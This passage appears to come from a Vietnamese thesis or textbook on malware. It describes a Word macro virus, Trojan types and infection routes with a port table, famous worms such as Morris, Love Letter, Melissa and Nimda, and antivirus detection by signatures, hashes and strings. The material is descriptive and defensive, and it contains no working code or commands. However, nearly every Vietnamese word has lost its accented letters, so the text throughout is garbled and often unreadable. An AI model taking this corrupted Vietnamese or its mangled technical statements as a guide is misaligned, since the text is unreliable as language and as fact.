1.4.2. Virus Macro W97M/Antivi.a 1.4.2.1. Nhng c trng ca virus

Virus macro ly nhim nhng file vn bn ca MicrosoftWord97. Virus c th loi b macrotrong file ca ngi dng khi n thc hin truyn nhim. Virus cha thng bo c vit bng ting B o Nha. Virus s sa i nhng ty chn ca ngi dng v nhng cnh bo bng ting B o Nha bn trong cc macro MicrosoftWord97. Virus s mc ni nhng mennu ty chn chy m ca n. Virus ny tn ti trong mt macro c tn Hunter (ngi i sn). Khi nhng ti liu c m ra v nu ti liu cha ng macro ca ngi dng th virus ny ngh loi b chng bng mt thng bo s dng ting B o Nha : Hunter Voce Posui o macro [Macro name] em seu arquivo Macros dese tipo conter virus Deseja remover o Macro. aconselhavel [YES] [NO] Nu ngi dng chn YES th Macro ca ngi dng s b loi b. Nu ngi dng chn NO th virus s a ra mt yu cu: Hunter Tem Certeza??? Alguns Virus podem danificar este computador!!! Clique Sim para remover o [Macro name] e No para manter o Macro Nu ngi dng chn YES th Macro ca ngi dng s b loi b. Nu ngi dng chn NO th s khng c hot ng g xy ra. Ngoi ra Virus ny cn cha ng chc nng v hiu ha t hp phm ALT+F8 v ALT+F11.
24

1.4.2.2. Du hiu my tnh khi b nhim virus

u tin Virus c gng kt ni vi trnh son tho Visual Basic Editor v hin th hp thng bo: Hunter preciso remover a protecao ANTIVIRUS ofrecida pelo Hunter antesde utilizar este servico. Sau virus s coppy chnh n ti File X.BAS ti ng dn C:\. S tn ti ca file ny xc nhn c s ly nhim ca virus ti mt thi im no .

1.4.2.3. Phng php ca s truyn nhim

Virus mc ni vi s kin m file ca MicrosoftWord97, bt k file no c m ra bi MicrosoftWords97 s b ly nhim Virus. Cc tn gi khc Virus macro ny c cc tn gi khc nh l: Macro Word97.Hunter W97M_Hunter WM97/Antiv-A

25

1.5. TROJAN 1.5.1. nh ngha Trojan

Nhiu ngi ngh rng khi h c mt chng trnh qut virus tt v c bn cp nht mi nht th h s an ton, my h s khng b nhim. Trojan hay khng ai c th truy cp my tnh ca mnh, iu ny hon ton sai. Mc ch ca ngi vit chng trnh chng virus l pht hin ra con virus mi, khng phi l Trojan. Nhng khi Trojan ly nhim n nhiu ngi s dng th nhng chuyn vin chng virus s np thm n vo trong chng trnh qut ca mnh. Tuy nhin y ch l mt phn rt nh cc Trojan m cc chuyn vin phng chng virus pht hin c v a vo trong danh sch nhng virus cn dit. Hn na, cc chng trnh qut virus ny khng phi l tng la, n s khng pht hin ra trojan v bo v ta trong khi ta ang trn mng. Nhiu ngi dng khng bit Trojan l g v h ti xung nhng file m khng bit r ngun gc.

1.5.2. Phng php ly nhim Trojan

Theo s liu thng k ca trung tm BKIS 90% s ngi c hi c ti xung, hay sao chp file t u khng th tr li l khng, nhng thc s h thc hin trc vi ngy. Trojan c th b ly nhim t rt nhiu con ng khc nhau: - Trojan ly nhim t ICQ - Trojan ly nhim t file nh km trong mail - Trojan truy nhp trc tip

26

1/. Trojan ly nhim t ICQ:

Nhiu ngi ngh rng Trojan khng th ly lan trong khi h ang ni chuyn trn ICQ nhng h khng ngh l ngi ang ni chuyn c th gi cho h mt con Trojan. ICQ cho php gi mt file .exe nhng n c sa sao cho nhn nh c v file l file hnh nh, m thanhV d, c mt con Trojan c kp chung vi file hnh nh v ngi gi thay i biu tng ca file .exe thnh biu tng ca file .bmp, ngi nhn s chy con Trojan v khng h nghi ng, v khi chy file .exe , n vn hin ln hnh nh nh mt file nh. Kt qu l trn my ngi nhn c mt con Trojan. l l do hu ht ngi dng ni rng h khng chy bt k file l no trog khi h chy n. Mt cch ngn nga tt nht l lun kim tra kiu file trc khi chy.

2/. Trojan ly nhim t file nh km trong mail:

a s Trojan c ly lan bng mail. Cc hacker hay ch nhn ca con Trojan thng nh km file Trojan vo trong mt bc th in t v gi i. Khi ngi dng kch hot vo file nh km hay c khi xem th th con Trojan c th c kch hot xm nhp h thng v thc hin cc chc nng .

3/. Trojan truy nhp trc tip:

Mt my tnh ngay c khi c trang b tt nht vi nhng bin php bo v, vi chng trnh chng virus tt nht th cng khng th lm g c trc s truy cp trc tip ca ngi c tnh a Trojan vo trong my tnh.

27

1.5.3. S nguy him ca Trojan

a s mi ngi cho rng Trojan khng c g nguy him, v my tnh ca h vn lm vic bnh thng v tt c d liu vn cn, nu l mt con virus th d liu c c th mt sch hay hot ng khng bnh thng . Khi my tnh b nhim Trojan, tt c d liu trn my tnh c th b nguy him, thng th ch nhn ca Trojan ny khng xa tt c file, m h s sao chp v khai thc nh ti liu b mt ca cng ty, ti khon Internet, ti khon c nhn v khi khng c g khc c th thc hin xa d liu. i khi hacker cn dng Trojan ci t virus ph hoi nh CIH chng hn. l mt vi v d hacker c th thc hin khi h ci thnh cng Trojan.

1.5.4. Phn loi Trojan

C nhiu Trojan, nhng ch yu n c chia ra lm cc dng sau:

1/. Trojan dng truy cp t xa :

Hin nay, Trojan ny c s dng rt nhiu. Chc nng chnh ca Trojan ny l m mt cng trn my tnh nn nhn hacker c th quay li truy cp vo my nn nhn. Trojan ny rt d s dng. Ch cn nn nhn b nhim Trojan v ch nhn ca n c a ch IP ca nn nhn th h c th truy cp ton quyn trn my nn nhn. Ty loi Trojan m chc nng ca n khc nhau (key logger, download, upload file, thc hin lnh..). Mt s con Trojan ni ting loi ny nh: netbus, back orifice

2/. Mc ni bn phm (keylogger) :

N ghi li tt c hnh ng trn bn phm ri lu vo trong mt file, hacker s tm n my tnh v ly i file cha ton b thng tin v nhng g ngi s dng g vo bn phm. V d: kuang keylogger, hooker, kuang2

28

3/. Trojan gi mt khu:

c tt c mt khu lu trong cache v thng tin v my tnh nn nhn ri gi v n hacker. V d: barok, kuang, bario

4/. Trojan ph hy :
Nhng con Trojan ny ch c mt nhim v duy nht l tiu dit tt c cc file trn my tnh. V d: CIH Nhng con Trojan ny rt nguy him v khi my tnh b nhim ch mt ln thi th tt c d liu mt ht.

5/. FTP Trojan:

Loi Trojan ny s m cng 21 trn my tnh v cho tt c mi ngi kt ni n my tnh m khng cn c mt khu v h s ton quyn ti bt k d liu no xung.

1.5.5. Mc ch ca Trojan
Nhiu ngi ngh rng hacker dng Trojan ch ph hoi my ca h, iu hon ton sai lm. Trojan l mt cng c rt hu hiu gip ngi s dng n tm c rt nhiu thng tin trn my tnh ca nn nhn. - Thng tin v Credit Card, thng tin v khch hng. - Tm kim thng tin v account v d liu b mt. - Danh sch a ch email, a ch nh ring. - Account Passwords hay tt c nhng thng tin c v cng ty.

29

1.5.6. Phng thc hot ng ca Trojan

Khi nn nhn chy file Trojan, nu l Trojan dng truy cp t xa (remote access), file server trong Trojan s lun ch lng nghe. N s ch n khi nhn c tn hiu ca Client, ngay lp tc n s m ngay mt cng no hacker c th truy cp vo. N c th s dng giao thc TCP hoc giao thc UDP. Khi hacker kt ni vo a ch IP ca nn nhn, h c th lm bt c iu g v ni dung Trojan bao hm nhng iu khin . Cn nu Trojan loi Keylogger hay loi gi mt khu th n tin hnh vic ghi li tt c nhng g c g trn bn phm. Tt c c lu tr trong mt file theo mt ng dn nht nh. Ti mt thi im no ch nhn ca con Trojan s xm nhp vo my tnh thng qua cng sau m con Trojan m v ly i file . i vi nhng con Trojan c phng thc gi file trong bn thn n th n tin hnh gi file n a ch email xc nh trc. i vi Trojan loi ph hy th hot ng ca n l np khi Windows khi ng v tin hnh cng vic xa file ca n. Mt vi Trojan c np ngay khi Windows c khi ng bng cch sa file win,.ini, system.ini hay sa registry.

30

1.5.7. Cng ca mt s Trojan thng dng

Tn gi Satanz Backdoor Shockrave WebEx Doly Trojan Ultors Trojan FTP 99CMP Trojan Cow Bugs The Invasor Masters Paradise WinCrash Sockers de Troie Firehotcker Blade Runner 2.x Blade Runner 1.x DeepThroat Cng 666 1981 1001 1011 1234 1492 2001 2115 2140 30129 4092 5000 5321 5402 5401 6771 Tn gi Silencer Shivka-Burka SpySender Psyber Sream Server VooDoo Doll BackDoor Ripper Deep Throat Phineas Phucker Portal of Doom ICQ Trojan Sockets de Troie 1.x Blade Runner Robo-Hack DeepThroat GateCrasher Cng 10001 1600 1807 1170 1245 1999 2023 2140 2801 3700 4590 5001 5400 5569 6670 6969

31

1.6. INTERNET WORM 1.6.1. Gii thiu chung

Su Internet Worm l loi virus c sc ly lan rng, nhanh v ph bin nht hin nay. Worm kt hp c sc ph hoi ca virus, c tnh m thm ca Trojan v hn ht l s ly lan ng s m ngi vit virus trang b cho n tr thnh mt k ph hoi vi v kh ti tn. Tiu biu nh Mellisa hay Love Letter. Vi s ly lan ng s chng lm t lit hng lot h thng my ch, lm ch tc ng truyn Internet. Thi im ban u, Worm c dng ch nhng virus pht tn bng cch tm cc a ch trong s a ch (Address book) ca my m n ly nhim v t gi chnh n qua email ti nhng a ch tm c. Nhng a ch m virus tm thy thng l a ch ca bn b, ngi thn, khch hng... ca ch s hu my b nhim. iu nguy him l virus c th gi mo a ch ngi gi l a ch ca ch s hu my hay a ch ca mt c nhn bt k no ; hn na cc email m virus gi i thng c ni dung git gn hoc hp dn d d ngi nhn m file virus nh km. Mt s virus cn trch dn ni dung ca mt email trong hp th ca nn nhn to ra phn ni dung ca email gi mo. iu ny gip cho email gi mo c v tht hn v ngi nhn d b mc la. Nhng vic ny din ra m ta khng h hay bit. Vi cch hon ton tng t trn nhng my nn nhn khc, Worm c th nhanh chng ly lan trn ton cu theo cp s nhn. iu l gii ti sao ch trong vng vi ting ng h m Mellisa v Love Letter li c th ly lan ti hng chc triu my tnh. Ci tn ca n, Worm hay "Su Internet" cho ta hnh dung ra vic nhng con virus my tnh b t my tnh ny qua my tnh khc trn cc "cnh cy" Internet. Vi s ly lan nhanh v rng ln nh vy, Worm thng c ngi vit ra ci thm nhiu tnh nng c bit, chng hn nh kh nng nh cng mt ngy gi v ng lot t cc my nn nhn (hng triu my) tn cng vo mt a ch no . Ngoi ra, chng cn c th mang theo cc BackDoor th ln my nn nhn, cho php ch nhn ca chng truy nhp vo my ca nn nhn v lm mi th nh ngi trn my mt cch bt hp php.
32

Ngy nay, khi nim Worm c m rng bao gm c cc virus ly lan qua mng chia s ngang hng peer to peer, cc virus ly lan qua a USB hay cc dch v gi tin nhn tc thi (chat), c bit l cc virus khai thc cc l hng phn mm ly lan. Cc phn mm (nht l h iu hnh v cc dch v trn ) lun tim n nhng li/l hng an ninh nh li trn b m, m khng phi lc no cng c th d dng pht hin ra. Khi mt l hng phn mm c pht hin, khng lu sau s xut hin cc virus c kh nng khai thc cc l hng ny ly nhim ln cc my tnh t xa mt cch m thm m ngi ch my hon ton khng hay bit. T cc my ny, Worm s tip tc b qua cc my tnh khc trn mng Internet vi cch thc tng t. Ta c th thy c s nguy him ca su Internet qua vic tm hiu su MyDoom. Ngy xut hin su MyDoom u tin: 26/01/2004 Ngy lan trn n Vit Nam: 27/01/2004 Cuc tn cng ca MyDoom ln nh im vo ngy 31/01/2004 khi c hng triu email nhim MyDoom cng ng lot gi ti Website ca Yahoo lm nghn mch. Bc tng la v b lc (Filewall v Filter) ngay lp tc c dng ln ngn chn v loi b tt c cc email c tiu : Test, Hi, Hello, Mail Delivery System, Mail Transaction Failed, Server Report, Status Error d y cng l tiu Yahoo hay s dng. D thit lp h thng bo v kp thi, trang web Yahoo t 8h17 n 12h10 trong ngy 31/01/2004 cng b tn cng bng lnh DoS (Denial of Service) v khi g dng lnh http://www.mail.yahoo.com/ th ng dn c thay th bng http://www.search.com/. Mi hot ng trn Website ny gn nh t lit.

33

Bin th su mi c gi l MyDoom.B (cn c tn l Norvarg.A, Mimailk) c kh nng chng truy cp vo cc trang web cung cp phn mm chng virus. Trong chng trnh vit ban u ca MyDoom ch to ln sng mail rc v tp trung chun b cho t ph hoi tng lc t ngy 01- 12/02/2004 vo website ca SCO Group Inc. Vi bin th mi MyDoom.B c b sung thm cu lnh tn cng thm website Microsoft. Su MyDoom c vit c ch nh l khng tn cng vo cc a ch email ca cc c quan chnh ph, mt s trng i hc, v mt s hng bo v my tnh, k c Symantec. Cc my tnh chy h iu hnh Windows XP ca Microsoft c nguy c b ly nhiu nht. Theo cc chuyn gia cng ngh, thit hi ti chnh do su MyDoom k c vic nh ch mng Internet v thit hi c tnh bng con s hng t . Phn mm dit MyDoom c cp nht u tin vo ngy 28/01/2004 (ca hng Symantic) 160.000 email nhim virus c gi n cho mt cng ty ch trong 60 pht ti USA. M nhiu cng nht: 71 cng , t cng 3127 n cng 3198. Symantec thng k c c ti 2.100 h thng khc nhau trn mng ang qut cc ca sau do MyDoom to ra. 50.000 h thng my tnh b nhim virus v b khng ch t xa, nguy c cho t tn cng tng lc. 300 triu th mang virus c pht tn, chim 1/12 tng lng email lu chuyn trn Internet trong hai ngy 500.000 my tnh b nhim MyDoom ch sau 3 ngy (k t khi pht hin su). 142 quc gia trn th gii b nhim.

34

1.6.2. Cc giai on pht trin ca su Internet

Thng qua s phn tch ca nhng con su Internet in hnh trong cc giai on pht trin ca su Internet, ta c th thy nguyn tc xy dng su Internet, tc pht trin ca loi virus ny v mc nguy him ca n.

1.6.2.1. Su Morris
Su Morris l su my tnh u tin c pht tn qua Internet v cng l con su u tin thu ht c s ch ng k ca cc phng tin thng tin i chng. Tc gi ca n l Robert Tappan Morris, mt sinh vin ti i hc Cornell. Su Morris c th ln mng vo ngy 2 thng 11 nm 1988 t hc vin MIT, n c pht tn t MIT che du thc t l con su c bt ngun t Cornell. (Robert Tappan Morris hin l gio s ti MIT.) Sai lm nghim trng bin con su t ch ch l mt th nghim tr thc c tim nng v hi thnh mt su tn cng t chi dch v y ph hoi l ti c ch ly lan. Con su xc nh xem c xm nhp mt my tnh mi hay khng bng cch hi xem hin c mt bn sao no ang chy hay cha. Nhng nu ch lm iu ny th vic xa b n li qu d dng, bt c ai cng ch phi chy mt tin trnh tr li rng "c" khi c hi xem c bn sao no cha, v con su s trnh. trnh chuyn ny, Morris thit k con su t nhn i vi xc sut 40%, bt k kt qu ca vic kim tra ly nhim l g. Thc t cho thy t l nhn i ny l qu cao v con su ly lan nhanh chng, lm nhim mt s my tnh nhiu ln. Ngi ta thng k rng c khong 6.000 my tnh chy Unix b nhim su Morris. Paul Graham ni rng "Ti chng kin ngi ta xo xo ra con s ny, cng thc nu n nh sau: ai on rng c khong 60.000 my tnh ni vi Internet, v con su c th nhim 10% trong s ". M c tnh thit hi vo khong t 10 n 100 triu la.

35

Robert Morris b x v buc ti vi phm iu lut nm 1986 v lm dng v gian ln my tnh (Computer Fraud and Abuse Act). Sau khi chng n, anh ta b pht 3 nm n treo, 400 gi lao ng cng ch v khon tin pht 10.050 la M. Su Morris i khi c gi l "Great Worm" (Su khng l) do hu qu nng n m n gy ra trn Internet khi , c v tng thi gian h thng khng s dng c, ln v nh hng tm l i vi nhn thc v an ninh v tin cy ca Internet.

1.6.2.2. Su Kakworm
Kakworm (KAV) l mt con su. N c xy dng vi mc ch xm nhp vo ch d b tn thng ca s bo v trnh duyt Internet Explorer hay chng trnh Outlook Express. Bn nng cp sa cha cho tnh d b tn thng ny c Microsoft a ra v cn thit phi nng cp li ngay (theo thng co an ton MicrosoftMS99-032). Nhng trnh duyt Microsoft v th tn in t cha b nh hng. KAV c gn vo trong ch k HTML ti tin nhn. Ngi dng khng nhn thy n bi v khng c dng vn bn no c th hin th n ra mn hnh (KAV c vit bng JavaScript). Ngi dng khng cn kch hot vo bt k file nh km no hoc thc hin bt k hot ng no kch hot KAV. Ch cn ngi dng xem th l con su KAV c th xm nhp vo h thng. c kch hot mt ln, KAV lu file KAK.HTA vo trong th mc khi ng ca Windows. Ln sau khi my tnh c khi ng, KAK.HTA chy v to ra KAK.HTA trong th mc Windows. Trong thng no cng c mt ln sau nm gi chiu con su KAK s hin th thng bo Kagou - Anti - Krosoft ni khng phi l hm nay v sau tt my tnh. KAK c xy dng da vo Bubbleboy, con su u tin c th lan truyn m khng cn ngi dng phi m file nh km.

36

1.6.2.3. Su Love Letter

Trong dng nguyn bn ca con su gi chnh n cho nhng ngi dng qua mt file nh km theo th tn in t. Ch tin nhn l I LOVE YOU v ni dung tin nhn l Mt cch chn thc kim tra bc th tnh yu nh km c gi n t ti. File nh km c gi LOVE -LETTER-FORYOU.TXT.vbs (m rng kp .txt.vbs). Khi kch hot vo file nh km chy (gi thit rng my tnh ci Windows Scripting Host) v chu trnh ly nhim li bt u ln na. S nhn i l cn thit cho con su ny ging nh khi n c gng khai thc s d dng ca hm s dng. Nhng chng trnh th tn v th mc theo s mc nh khng cho thy nhng phn m rng ca file. Trong trng hp ny nu my tnh c tp hp ty chn mc nh th file nh km l ra ging nh gi LOVE -LETTER-FOR-YOU.TXT v nh vy l mt file vn bn thay v mt file c th thc hin. Trong thao tc, con su thc hin vi hot ng: N kim tra file WinFAT.32.exe trong th mc ti xung t Interner Explorer. Nu khng tm thy con su thay i trang khi ng Internet Explorer ng k ti mt trong mt s website ni file WIN-BUGSFIX.exe s c ti xung v tp hp chy trn my tnh cho ln tip theo. Con su s sao chp chnh n vo hai ch ni n s thi hnh khi ng li trn mi my tnh khc. N s c gng gi chnh n cho mi a ch trong danh sch a ch Outlook . Con su tm kim tt c nhng file c phn m rng l VBS, VBE, JS, JSE, CSS, .WSH, SCT hoc HTA. Nu tm thy, chng s ghi ln vi virus v phn m rng ca n i tn thnh .VBS. File ha vi phn m rng l JPG hoc JPEG cng c ghi ln vi virus v phn m rng .VBS s c thm vo tn ca n.

37

Nhng file a phng tin vi phn m rng l MP2 v MP3 th c sao chp ti mt file mi cng tn v phn m rng .VBS cng c thm vo. Con su tm kim mt chng trnh client MIRC v nu tm thy, s th mt bn sao v file HTML c thit k gi con su qua MIRC . Nhng file virus nguyn bn c s nh hng rt nhiu, nhiu bin th pht trin nhanh chng v tri rng ra. Hn 20 bin th c bo co v trong thi gian s lng bin th thc t nhiu hn s lng bin th c bo co. Mt vi n tng nht c th ni n: Ch fwd: khng c ni dung no, file nh km: very funy.vbs. Ch Ngy nhng ngi m: c ni dung Chng ta c th hot ng rt t th gi ca bn khong 326.92 USD cho ngy l c bit nhng ngi m. Chng ti gn mt danh sch n hng chi tit ti a ch email ny. Xin in ra file nh km v gi n trong mt ch an ton. Cm n mt ln na v mong c mt ngy nhng ngi m hnh phc: mothersday@subdimension.com, file nh km: mothersday.vbs. Ch : virus ALERT !!!, gi t: support@symatec.com, ni dung: khch hng Symantec thn mn, trung tm nghin cu AV ca Symantec bt u nhn nhng bo co lin quan ti VBS.LoveLetter. Mt virus vo mt bui sng sm ngy 4/5/2000 GMT. Con su ny xut hin bt ngun t vng Thi Bnh Dng Asia. S phn phi ca virus ny lan rng v hng trm trong hng nghn nhng c my c bo co b ly nhim, file nh km: protect.vbs. Ch : Lm sao bo v chnh ta khi con rp ILOVE !, ni dung: t y th ta s c cch loi tr virus tnh yu, file nh km: Virus-ProtectionIntruction.vbs.

38

1.6.2.4. Su Melissa
Melissa l mt s kt hp gia virus marco v con su email. Con su u tin c tm thy vo th su, ngy 26 thng 3 nm 1999 v s dn tri ra c thc hin rt nhanh chng xung quanh th gii . V c bn, khi mt ngi dng kch vo file .DOC nh km theo th in t chng s chy c virus marco. Mt trong nhng vic u tin m virus s lm l nh dng v gi mt thng bo ti 50 a ch u tin trong danh sch a ch Outlook. Ch liu l Tin nhn quan trng t <Username ca bn >.V ni dung tin nhn: y l ti liu m bn hi v ....(khng cho bt c ai khc thy). Gn lin ti thng bo ny l ti liu hin thi ang lm vic. T khi Mellissa l virus v ly nhim file NORMAL.DOC n c th gi file ly nhim ra ngoi ging nh l ci g ht sc quan trng t my tnh nhn c. Vo trng hp him c ni pht, gi, ngy v thng l ging nhau (8 gi 8 pht ngy 8 thng 8) virus s chn mnh Hai mi hai, thm vo b ba t ghi im, cng vi nm mi im cho vic s dng tt c nhng bc th ca ti. Tr chi kt thc. Phn phi ban u ca virus Melisa l vo mt file gi l LIST.DOC ci m cha ng nhng mt khu ca nhng website X-rated, nhng website khng lnh mnh.

39

1.6.2.5. Su Nimda
Nimda l mt trong s nhng con su phc tp c xy dng theo s thu mn. N ly nhim file, thc hin dn tri qua ng Website, ng th tn in t, v s dn tri qua khai thc vng mng cc b. N ly nhim tt c cc phin bn ca Windows t Windows95 n Windows2000 cng nh IIS ca Microsoft. Nimda cng ly lan qua Website ng khng kn v vy m cc trnh duyt s ly lan c vic nhn trang Web. Cui cng, Nimda l con su u tin s dng my tnh ca ngi dng qut mng cc b xc nh nhng c my c th b tn thng ng sau bc tng la c th tn cng (trc y ch nhng con su ly lan qua server mi lm vic ). Nimda s dng mt vi nhc im c bit n trong nhng server IIS Microsoft. Mt s nhc im c nhc n ti a ch: http://www.microsoft.com/tech/security/bulletin/ms00-078.asp http://www.microsoft.com/tech/security/bulletin/ms01-020.asp Su Nimda s dng mt s phng php sau lan truyn: - T khch hng n khch hng qua th tn in t v ly nhim file.EXE - T khch hng n khch hng qua mng chia s cc b. - T ngi phc v mng n khch hng qua trnh duyt ca nhng website. - T khch hng n ngi phc v mng qua s tch cc qut v s khai thc tnh d b tn thng ca Microsoft IIS 4.0/5.0 directory travarsal. - T khch hng n ngi phc v mng qua s qut nhng ca sau c li bi con su Code Red II v sadmind/IIS.

40

1/. Ly nhim file:

Nimda hnh ng ging nh bt k file ly nhim chun no. N tm kim nhng file .EXE v thm vo nhng file chnh n nh mt ti nguyn. Khi file .EXE c mt ngi s dng ti xung ri th s nh hng ca n li c tng kh nng lan rng. ng thi, nu file ly nhim trn mt my tnh trong mng cc b, nhng file chia s c th cng s lm lan rng ra s nh hng ca con su Nimda. Khi mt file ly nhim thc hin ly nhim qua nhng file khc. Nimda thc hin xa file ny sau khi n kt thc nhng khng th lun lun lm c iu ny. thc hin iu n to ra WININI.INI vi nhng lnh xa file trong ln Windows khi ng sau . Nimda tm kim file ly nhim. Nhng file .EXE gy ly lan bng cch tm kim cc kha v tt c kha khc. [SOFTWARE \ Microsoft\Windows\currentVersion\App Paths] [SOFTWARE \ Microsoft\Windows\currentVersion\Explorer \Shell Th mc] c bit, file WINZIP32.EXE th khng b ly lan.

2/. Vai tr l su Email:

Theo kha cnh khc, Nimda hnh ng ging nh cc con su khc. N tm kim a ch danh sch email khch hng trong my nn nhn. V nhng file HTML trn my tnh cho a ch email v sau gi chnh n cho nhng a ch ny trong mt file nh km. Loi u tin c nh ngha nh loi Vn bn/Html nhng khng cha ng ni dung g c. Loi th hai c nh ngha nh loi m thanh/X-Wav ", nhng cha ng mt file nh km c tn l README.EXE, l mt chng trnh. Nimda s dng nghi thc SMTP ca chnh mnh gi email.

41

3/. Vai tr l su Web:

Nimda qut Internet cho nhng server mng IIS Micrososft. Khi mt server c tm thy, nu tm c l hng bo v c th thm nhp vo, th Nimda vo v sa i nhng trang Web ngu nhin trn server (cng nh nhng file .EXE trn server). Nhng s ci bin cho php con su c th lan truyn ti ngi dng mt cch n gin ngay c khi duyt Website . lm iu , Nimda tm kim m ngun ca file .HTML v .ASP. Khi tm thy, n thm mt trnh JavaScript cui file .HTML v .ASP. M JavaScript ny m mt file c tn README.EML khi c np bi mt trnh duyt mng . README.EML l dng khc ca con su, c t vo trong th mc ni m file thc thi nhng file .HTML c tm thy trn. Nhng trnh duyt cha c lp cc l hng s t ng thc thi nhng file ny m khng cn ngi dng phi kch hot vo. Ngi dng s khng nhn thy con su hot ng khi n chy trong mt ca s thu nh. Ly nhim qua nhng file chia s. S ly lan nhng my tnh trn mt mng cc b s tm kim my tnh khc thng qua file chia s m. Khi no tm thy, Nimda s chuyn h thng hoc file n (RICHED20.DLL) ln trn my tnh khc trong bt k th mc no ni nhng file vn bn c ui .DOS hoc .EML c tm thy. Sau , nu nhng file ny c m bng Word, Wordpad, hoc Outlook nhng file n RICHED20.DLL cng s t ng c thi hnh. Chnh iu ny s gy ra s ly lan cho my tnh . ng thi, Nimda s c gng thay th file RICHED20.DLL ca Windows sp xp v t nhng file c ui .EML (i khi l ui .NWS) vo trong nhng th mc n truy nhp.

42

Nimda trn my tnh ca nn nhn. Nimda thng thng xut hin nh mt file nh km README.EXE vi mt email, nhng c th l ra nh bt k ci no khc. File c ui .EXE vi hn 50 c tnh trong file gc c bn. Nu chy, bn thn n trc ht sao chp ti mt th mc tm thi vi mt ci tn t ngu nhin dng MEP*.TMP ( u c * l c i din nhng c tnh ngu nhin). Ri sau t ci th mc ny c t mnh thc hin bng cch s dng dng lnh ty chn -Dontrunold ) . S dng nhng thao tc s hc s gip con su xc nh liu xem n c th xa file (trong th mc tm). Nu m lm c th con su s xy dng c cng c truyn nhim s cp ca n: mt MIME c m ha sao cho c th sao chp chnh n cho nhng tin nhn nhiu phn m c th gn vo. Nhng con su mi ny s c gn cho mt ci tn ngu nhin v c ct gi trong mt th mc tm thi. By gi th n sn sng thc thi cng vic. Cui cng, con su sao chp chnh n ti RICHED20.DLL, trong th mc Windows\System, v t file n vo h thng. Khi Nimda c thc thi tm kim nhng ti nguyn mng dng chung v bt u qut nhng file c chia s. Mt s file c phn m rng .DOC v .EML n ang tm kim, khi tm thy, RICHED20.DLL c sao chp ti th mc ca chng sao cho n s c chy khi mt thnh phn OLE c cm trn my tnh t xa. iu ny, sau s gy ra qu trnh truyn nhim trn my tnh t xa. Mt vi bn sao ca con su lm mt s vic sau: N sa i kha [Software \ Microsoft \ Windows \ CurrentVersion \ Explorer\Advanced] nhng file n khng cn nhn thy c. iu ny s che du con su trong Explorer. N to thm ti khon Guest trn h thng b ly nhim v ghp ti khon Administrator v Guest thnh nhm c bit. S dng iu ny n s to ra chia s " c:\ vi y nhng quyn truy cp c bit. N xa nhng kha con t kha [ SYSTEM \ CurrentControlSet \ Servieces \lanmanserver \ Shares \ Security ] m tc dng vic lm l v hiu ha c s chia s an ton.
43

Chng 2. NHN DNG V PHT HIN VIRUS 2.1. K THUT NHN DNG VIRUS 2.1.1. Nhn dng chnh xc mu (Signature based delection)
L cng vic nhn dng chnh xc cc virus khi chng trnh Anti Virus AV c mu ca virus . K thut ny c th m t n gin nh sau: cc file cn kim tra virus c phn tch v so snh vi mu virus bit trc, nu pht hin mt on m virus th file c th b ly nhim virus v phn mm thc hin bin php loi b virus khi file b ly nhim. K thut nhn dng chnh xc mu virus khin cho cc phn mm lin tc phi cp nht c s d liu c kh nng nhn bit cc loi virus mi cng cc bin th ca n. Cc phn mm dit virus u s dng k thut ny qut virus. S cc m nhn dng cng ln th kh nng dit virus ca AV cng cao. Tt c cc k thut nhn dng khc ra i u vi mc ch b tr cho nhng thiu st ca k thut nhn dng ny. + u im ca k thut nhn dng chnh xc mu virus: chnh xc ca vic nhn dng virus cao, t nhm ln. Kt qu ca vic dit virus tt hn. Cc k thut nhn din tng i ch cho php nghi ng mt file c phi l virus hay khng. Nhn din chnh xc cho php loi b cc triu chng i km vi virus, khi phc li h thng.

44

+ Nhc im ca k thut nhn dng chnh xc mu virus: Khuyt im ln nht ca k thut nhn dng chnh xc mu l khng th i ph c vi cc virus mi hoc cha xut hin khi cha c mu nhn din. Khi lng c s d liu lu tr cc mu virus ln, lm cho kch thc ca phn mm dit virus ln. K thut ny i hi phi cp nht c s d liu lin tc nn mt nhiu chi ph v thi gian, tin bc, cng sc.

2.1.2. Nhn dng theo m i din

Bn cht ca mt file bt k l mt chui s di, nn chng ta c th coi l mt chui string v tin hnh ly m hash ca file. Do tnh cht ca mnh, m hash ny gn nh l duy nht. Khi chng ta c mu ca 1 virus chng ta s c th ly c t mu mt m hash.Khi vic nhn dng mt file c phi l virus hay khng chnh l vic to m hash file ri so snh hash vi hash mu virus. C hai cch ly nhn dng theo m hash l: ly hash theo ton file v ly hash theo mt phn thng tin quan trng.

2.1.2.1. Ly i din theo ton file

Cch n gin nht to bn nhn din c trng cho mt mu virus l tnh hash c trng cho cho ton b file mu. Cc thut ton hash thng c s dng trong trng hp ny l MD5, SHA1, SHA256 ... c xc xut trng lp thp c th s dng lm bn nhn din c trng cho mt file. + u im: Cch thc hin n gin. + Nhc im: Chi ph tnh ton cao, thi gian tnh hash chm, nht l vi file c kch thc ln. Nhc im ny bc l r khi qut virus cho tt c cc file trong h thng.

45

2.1.2.2. Ly i din theo mt phn thng tin quan trng

khc phc nhc im trn ngi ta ci tin bng cch ch tnh hash ca mt phn thng tin quan trng no ca file .V d i vi file thc thi (.exe, .com, .dll, .sys .) phn thng tin quan trng c th l PE header (Portable executable), vng nh xung quanh Entry Point ca chng trnh. Vic la chn vng thng tin no l quan trng ph thuc vo chin lc ring ca tng hng AV + u im: ci tin c tc ly hash ng k so vi phng php ly hash ton file. + Nhc im: Ci t phc tp hn phng php ly hash ton file. Khng phi tt c cc nh dng file u c th la chn c vng cha thng tin quan trng, c trng ca n, ch c th p dng vi mt s nh dng nht nh.

2.1.3. Scan theo string

y l cch c in nht v vn c s dng ph bin trong hu ht cc AV hin nay. Ti v tr offset nht nh:

2.1.3.1. Xt theo offset tnh hon ton

Trong cch ny th ch n thun xc nh string no, ti v tr offset l bao nhiu, ta s dng sign ny nhn dng mt file c phi l virus hay khng. Nguyn tc chn string nhn ra u l virus thng da vo tnh c th ca tng virus m string c chn c th khc nhau. +u im: Cch thc update mt sign v scan kh d thc hin.

46

+ Nhc im: Cch scan ny kh b ng vi h virus, v d nu tm cch chn thm hay xa 1 byte trong file binary ca virus (vn phi m bo virus chy c) m byte ny nm trc phn offset sign th tt yu phng php ny khng th nhn ra mu virus sau khi b thay i.

2.1.3.2. Xt theo v tr offset tng i

cch ny a ch offset c tnh da vo mt thnh phn no (nh Entry Point, Section th my ..) Vic xt nh th ny c th m rng ra nh offset: Entry Point + S no . Sau y chng ta xt mt v d vi vic so snh cu trc 2 bin th khc nhau ca dng virus: w32.funnyIM.worm Ban u chng ta xc nh a ch Entry Point ca 2 mu virus:

Chng ta quan st hnh sau:

String ca 2 mu virus

47

